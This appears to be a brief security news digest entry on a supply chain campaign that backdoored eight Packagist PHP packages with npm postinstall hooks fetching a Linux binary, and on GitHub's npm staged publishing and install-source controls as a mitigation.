Two related supply chain items this week cover the Packagist and npm ecosystems: an active attack in which eight PHP packages on Packagist were backdoored with npm postinstall hooks that download and execute a Linux ELF binary on build hosts, and a GitHub-released mitigation in the form of npm staged publishing and install-source controls that close two persistent attack vectors the Packagist campaign exploits. Organizations running PHP projects that also use npm for frontend tooling are directly in scope for the active attack; all teams consuming npm packages face the structural risk that TeamPCP is actively exploiting through package poisoning at scale.